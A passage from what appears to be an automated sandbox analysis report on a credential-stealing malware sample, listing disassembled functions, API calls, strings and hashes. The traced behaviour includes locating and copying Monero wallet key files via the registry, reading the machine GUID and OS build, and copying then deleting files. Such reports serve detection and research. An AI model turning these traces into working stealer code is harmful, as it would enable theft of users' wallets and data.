                                                                                                                                                                                                                • Part of subcall function 00921A51: RegQueryValueExA.ADVAPI32(00921AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00921AA4
                                                                                                                                                                                                                • Part of subcall function 00921A51: RegCloseKey.ADVAPI32(00921AE9), ref: 00921AAD
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00921AF1
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00921AFE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,.keys), ref: 00921B19
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00921C2A
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00921C9D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                              • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                              • API String ID: 615783205-3586502688
                                                                                                                                                                                                              • Opcode ID: 2740a499e781c5b7b9db8543e5aaf6d11f1f0d5eea9de710ae7387c045172f78
                                                                                                                                                                                                              • Instruction ID: c2c13337250dcd33beb4af4570119d899938aaf469669807b5971a52de08e4f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2740a499e781c5b7b9db8543e5aaf6d11f1f0d5eea9de710ae7387c045172f78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2951F575D9012E9BCB21FB64ED46BDD7778AF84304F4045A1B608B7156DA30AFCA8F84
                                                                                                                                                                                                              Function 0092FB02 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0092FB27
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0092FB53
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092FB96
                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0092FCEC
                                                                                                                                                                                                                • Part of subcall function 0092F005: _memmove.LIBCMT ref: 0092F01F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                              • String ID: N0ZWFt
                                                                                                                                                                                                              • API String ID: 2647191932-431618156
                                                                                                                                                                                                              • Opcode ID: 1ff14ee1cf7984e29dd92a803250f89792846464823fed51aeff464caa6009fb
                                                                                                                                                                                                              • Instruction ID: 3239f8c60839930779647e0c5111abf6a4db58d4b92683efb447e47c464ec7cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ff14ee1cf7984e29dd92a803250f89792846464823fed51aeff464caa6009fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F25180B1D0022C9BDB20AF64EC95BEDB7B9AB84304F4001F9A609A7156DA716E88CF55
                                                                                                                                                                                                              Function 009315A9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009315DC
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 009315FB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00931620
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0093162C
                                                                                                                                                                                                              • CharToOemA.USER32(?,?), ref: 00931640
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                              • API String ID: 2235053359-1211650757
                                                                                                                                                                                                              • Opcode ID: 2c9b78bad72d69a39dcd71c950180ced7f083d84b7b01c10769ae38e84856cb7
                                                                                                                                                                                                              • Instruction ID: 7b11a944ebd5b6cc8dc442d520aca71bcfab56d74fab43488de210e16c3c5a55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c9b78bad72d69a39dcd71c950180ced7f083d84b7b01c10769ae38e84856cb7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 601121B590121DAFEB10DFA0DD89EEAB7BCEF14305F4041E5A619E2062DA709E898F10
                                                                                                                                                                                                              Function 00921A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00921A65
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00921A6C
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00921AE9), ref: 00921A89
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00921AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00921AA4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00921AE9), ref: 00921AAD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • wallet_path, xrefs: 00921A9C
                                                                                                                                                                                                              • SOFTWARE\monero-project\monero-core, xrefs: 00921A7F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                              • API String ID: 3466090806-4244082812
                                                                                                                                                                                                              • Opcode ID: f3313f54edb719ff20e0a47dcd9d87ba7e12617a173749c90b72bf1d6febfe85
                                                                                                                                                                                                              • Instruction ID: 212a1133d26e924184b129c75e7658813d2cf241fd4df95196469e2ddc821030
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3313f54edb719ff20e0a47dcd9d87ba7e12617a173749c90b72bf1d6febfe85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF05E75640304BFFB118B91DC4AFAE7A7CEF88B15F1401A4BA15EA0E1DAB09A809724
                                                                                                                                                                                                              Function 00935E39 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00935EC8
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00935EE5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F04
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F18
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935F2B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F3F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935F52
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 00935B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00935B72
                                                                                                                                                                                                                • Part of subcall function 00935B4D: HeapAlloc.KERNEL32(00000000), ref: 00935B79
                                                                                                                                                                                                                • Part of subcall function 00935B4D: wsprintfA.USER32 ref: 00935B92
                                                                                                                                                                                                                • Part of subcall function 00935B4D: FindFirstFileA.KERNEL32(?,?), ref: 00935BA9
                                                                                                                                                                                                                • Part of subcall function 00935B4D: StrCmpCA.SHLWAPI(?,00956AA0), ref: 00935BCA
                                                                                                                                                                                                                • Part of subcall function 00935B4D: StrCmpCA.SHLWAPI(?,00956AA4), ref: 00935BE4
                                                                                                                                                                                                                • Part of subcall function 00935B4D: wsprintfA.USER32 ref: 00935C0B
                                                                                                                                                                                                                • Part of subcall function 00935B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00935CC8
                                                                                                                                                                                                                • Part of subcall function 00935B4D: DeleteFileA.KERNEL32(?), ref: 00935CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1546541418-0
                                                                                                                                                                                                              • Opcode ID: 1c13dd152019cddb3af37b344fc8872b21e624d407fa8d735feabb844154db73
                                                                                                                                                                                                              • Instruction ID: 7c18cdbff2c3f83552cb26e3c5c9c0961ea4a1db894699ef716fd2ecd7db7e1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c13dd152019cddb3af37b344fc8872b21e624d407fa8d735feabb844154db73
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551C6B5A0012C9BCB65DB64DC85AD9B7B9AF4C310F4444E6EA09E3250EA30AB89CF54
                                                                                                                                                                                                              Function 00930B05 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B19
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B20
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B4E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B6A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B73
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: Windows 11
                                                                                                                                                                                                              • API String ID: 3466090806-2517555085
                                                                                                                                                                                                              • Opcode ID: 7fd72c7879dc5d6535f3b65f9037cb675ffbbdfe8e7dfdc4a8f5aa0083e63670
                                                                                                                                                                                                              • Instruction ID: c4f854a962d2d5bcd4939627e819e28ba0f69400ae30c7130060872283c2cb1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fd72c7879dc5d6535f3b65f9037cb675ffbbdfe8e7dfdc4a8f5aa0083e63670
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F04F75600304FBEF115BA1DC4AF6EBA7CEF88B05F1400A4F605AB0A1DAB0D980DB20
                                                                                                                                                                                                              Function 00930B7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B92
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B99
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930BB7
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ), ref: 00930BD2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930BDB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                                                              • API String ID: 3466090806-1022791448
                                                                                                                                                                                                              • Opcode ID: 91462a1c81e7012fa0e6464ed24dfc9448e6715e7f709c939ce551e1f61eaa62
                                                                                                                                                                                                              • Instruction ID: b5bf42acfa9beb9ad81a5060124e1aba808dd0ed48ae15f95475257f868dda1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91462a1c81e7012fa0e6464ed24dfc9448e6715e7f709c939ce551e1f61eaa62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F09A71640304FBFB119B91DC4AFAE7A7CEF88B05F140098F605AB0A1EEB099809B24
                                                                                                                                                                                                              Function 009356AF Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009356E4
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00935704
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0093572A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00935736
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935765
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935778
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3891774339-0
                                                                                                                                                                                                              • Opcode ID: a0e138e2e99bfb85b38f87036a4502c9921497c15a6e5047b7495a16ca683986
                                                                                                                                                                                                              • Instruction ID: 41d72fdda2c8f8d18c219472c407858f4abe25c358b4d2827e2b01fda21d3783
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0e138e2e99bfb85b38f87036a4502c9921497c15a6e5047b7495a16ca683986
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2241667194011DAFCB25EB20EC8AEE877B9FF58304F0104A9A51DA31A1EE719ED5CF90
                                                                                                                                                                                                              Function 00927FAC Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                              • LocalFree.KERNEL32(0092EC91,?,?,?,?,0092E72B,?,?,?), ref: 0092802B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              Memory Dump Source
